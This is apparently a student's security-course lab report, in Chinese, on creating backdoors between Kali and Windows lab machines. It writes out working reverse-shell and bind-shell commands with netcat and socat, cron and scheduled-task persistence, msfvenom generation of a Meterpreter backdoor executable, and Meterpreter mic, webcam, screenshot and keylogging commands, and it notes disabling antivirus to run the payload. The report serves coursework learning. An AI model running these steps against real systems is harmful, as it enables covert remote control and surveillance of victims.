20165306 Exp2 後門原理與實踐

20165306 Exp2 後門原理與實踐

實驗內容

(1)使用netcat獲取主機操做Shell，cron啓動

(2)使用socat獲取主機操做Shell, 任務計劃啓動

(3)使用MSF meterpreter（或其餘軟件）生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell

(4)使用MSF meterpreter（或其餘軟件）生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權

基礎問題回答

(1)例舉你能想到的一個後門進入到你係統中的可能方式？

下載的軟件有後門

(2)例舉你知道的後門如何啓動起來(win及linux)的方式？

win：設置爲開機自啓動

Linux：將木馬設爲定時啓動

(3)Meterpreter有哪些給你映像深入的功能？

居然能夠獲取目標主機音頻、攝像頭、擊鍵記錄等內容

(4)如何發現本身有系統有沒有被安裝後門？

安裝專門的殺毒軟件，實時防禦，並按期檢測電腦安全狀況

---

1、後門概念

• 後門就是不通過正常認證流程而訪問系統的通道。

• 相對狹義一點的後門的概念：後門特指潛伏於操做系統中專門作後門的一個程序，「壞人」能夠鏈接這個程序，遠程執行各類指令，概念和木馬有重疊。

2、經常使用後門工具

關於netcat

又名nc、ncat,是一個底層工具，進行基本的TCP UDP數據收發。常被與其餘工具結合使用，起到後門的做用。

（一）Win得到Linux Shell

1.在Windows下使用ipconfig查看本機IP爲192.168.199.175

2.使用ncat.exe程序監聽本機的5306端口ncat.exe -l -p 5306

3.在Kali環境下，安裝ncat，使用nc指令的-e選項反向鏈接Windows主機的5306端口

nc 192.168.199.175 5306 -e /bin/sh

4.成功得到Kali的shell，可運行任何指令，如ls

（二）Linux得到Windows Shell

1.在Kali環境中使用ifconfig查看IP爲192.168.95.136

2.使用nc指令監聽5306端口nc -l -p 5306

3.在Windows下，使用ncat.exe程序的-e選項項反向鏈接Kali主機的5306端口

ncat.exe -e cmd.exe 192.168.95.136 5306

4.Kali下能夠看到Windows的命令提示

（三）使用nc傳輸數據

1.Windows下監聽5306端口ncat.exe -l 5306

2.Kali下鏈接到Windows的5306端口ncat 192.168.199.175 5306

3.創建鏈接以後，在Kali中輸入數據，按下回車，Windows中就能夠顯示傳輸的數據了

3、Meterpreter

• 後門就是一個程序。

• 傳統的理解是：有人編寫一個後門程序，你們拿來用。

• 一個平臺能生成後門程序。這個平臺把後門的基本功能（基本的鏈接、執行指令）， 擴展功能（如蒐集用戶信息、安裝服務等功能）， 編碼模式， 運行平臺， 以及運行參數 全都作成零件或可調整的參數。用的時候按須要組合，就能夠生成一個可執行文件。

• 接下來學習如何使用msfenom生成後門可執行文件，要生成的這個後門程序是Meterpreter。

• 參數說明：

  • -p 使用的payload。payload翻譯爲有效載荷，就是被運輸有東西。這裏windows/meterpreter/reverse_tcp就是一段shellcode

  • -x 使用的可執行文件模板，payload(shellcode)就寫入到這個可執行文件中

  • -e 使用的編碼器，用於對shellcode變形，爲了免殺

  • -i 編碼器的迭代次數。如上即便用該編碼器編碼5次

  • -b badchar是payload中須要去除的字符

  • LHOST是反彈回連的IP

  • LPORT 是回連的端口

  • -f 生成文件的類型

  • > 輸出到哪一個文件

（一）使用netcat獲取主機操做Shell，cron啓動

1.在Windows系統下，監聽5306端口nc -l -p 5306

2.Kali下用crontab -e指令編輯一條定時任務，選擇編輯器3

3.按i進入插入模式，在最後一行添加52 * * * * /bin/netcat 172.168.199.175 5306 -e /bin/sh，意思是在每一個小時的第52分鐘反向鏈接Windows主機的5306端口

4.當時間到了12:52時，此時已經得到了Kali的shell，能夠在Windows下輸入指令ls

（二）使用socat獲取主機操做Shell, 任務計劃啓動

socat

socat是ncat的加強版，它使用的格式是socat [options] <address> <address>，其中兩個address是必選項，而options是可選項。 socat的基本功能就是創建兩個雙向的字節流，數據就在其間傳輸，參數address表明其中的一個方向。所謂流，表明數據的流向，而數據則能夠有許多不一樣的類型，命令中也就相應須要許多選項對各類不一樣的類型數據流進行限定與說明。

實驗步驟

1.搜索計算機管理→ 任務計劃程序 → 建立任務

→常規→任務名稱：socat_5306

→觸發器→新建→開始任務選擇工做站鎖定時→肯定

→操做→程序或腳本點擊瀏覽→選擇socat.exe的路徑→添加參數填寫tcp-listen:5306 exec:cmd.exe,pty,stderr，把cmd.exe綁定到端口5306，同時把cmd.exe的stderr重定向到stdout上→肯定

2.建立完成以後，按Windows+L快捷鍵鎖定計算機，再次打開時，能夠發現以前建立的任務顯示正在運行

3.在Kali下輸入socat - tcp:192.168.199.175:5306，這裏的第一個參數-表明標準的輸入輸出，第二個流鏈接到Windows主機的5306端口，此時能夠發現已經成功得到了一個cmd shell

（三）使用MSF meterpreter生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell

1.Kali下輸入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.95.136 LPORT=5306 -f exe > 20165306_backdoor.exe生成後門程序

• 注：這裏的IP地址爲控制端IP，即Kali的IP

2.Windows下輸入ncat.exe -lv 5306 > 20165306_backdoor.exe，經過nc指令將生成的後門程序傳送到Windows主機上

3.Kali下輸入nc 192.168.199.175 5306 < 20165306_backdoor.exe

• 注：這裏的IP地址爲被控主機IP，即Windows的IP

Windows顯示鏈接成功

4.Kali下使用msfconsole指令進入msf控制檯

5.使用監聽模塊，設置payload，設置反彈回連的IP和端口

• 注：set LHOST用的是Kali的IP，和生成後門程序時指定的IP相同

設置完成後，執行監聽

6.運行Windows下的後門程序20165306_backdoor.exe

7.此時Kali上已經得到了Windows主機的鏈接，而且獲得了遠程控制的shell

（四）使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容

1.使用record_mic指令能夠截獲一段音頻

2.先打開Windows相機功能，Kali下使用webcam_snap指令可使用攝像頭進行拍照

3.使用screenshot指令能夠進行截屏

4.使用keyscan_start指令開始記錄下擊鍵的過程，使用keyscan_dump指令讀取擊鍵的記錄

4、遇到的問題

1.socat任務建立完成以後，按Windows+L快捷鍵鎖定計算機，再次打開時，發現以前建立的任務顯示準備就緒，而不是正在運行

解決：右擊→運行

2.使用MSF meterpreter生成可執行文件時IP地址輸錯

解決：控制端和被控主機不要弄混，控制端--Kali，被控主機--Windows

3.運行Windows下的後門程序20165306_backdoor.exe時顯示拒絕訪問

解決：關閉「病毒和威脅防禦」和「防火牆和網絡保護」